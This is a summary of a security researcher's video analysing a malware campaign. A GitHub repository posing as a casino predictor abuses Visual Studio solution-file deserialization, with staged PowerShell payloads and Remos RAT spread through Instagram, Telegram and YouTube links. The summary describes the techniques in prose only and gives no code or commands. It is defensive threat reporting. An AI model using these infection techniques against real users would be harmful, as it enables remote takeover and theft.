This video explores the malicious use of GitHub repositories hosting malware, particularly targeting online gambling platforms like stake.com, using sophisticated techniques such as Visual Studio evil solution exploits and deserialization vulnerabilities. It also uncovers the active deployment of remote access Trojans (RATs), including Remos RAT, through links distributed via social media platforms like Instagram, Telegram, and YouTube. #RemosRat #VisualStudioEvilSolution
Keypoints :
- The GitHub repository βLimbo Casino Predictor Strategiesβ included malware exploiting Visual Studio deserialization vulnerabilities.
- Malware used the Suo exploit, running malicious code automatically upon opening solution files in Visual Studio.
- Decrypted payloads reveal stages of infection, including remote access Trojans like Remos RAT and other malicious binaries.
- The malware infrastructure relies on social media and GitHub repositories to host and stage malicious payloads.
- Advanced techniques involve PowerShell scripts downloading, decrypting, and executing malicious code from command and control servers.
- Active promotion and distribution of malware via Instagram, Telegram, and YouTube links, often embedded in social media posts.
- The attack chain includes sophisticated obfuscation, staged payloads, and the exploitation of old, sometimes obsolete, repositories and accounts.
- Youtube Video: https://www.youtube.com/watch?v=pw0xSFEnowk
- Youtube Channel: John Hammond
- Youtube Published: Tue, 27 May 2025 13:01:30 +0000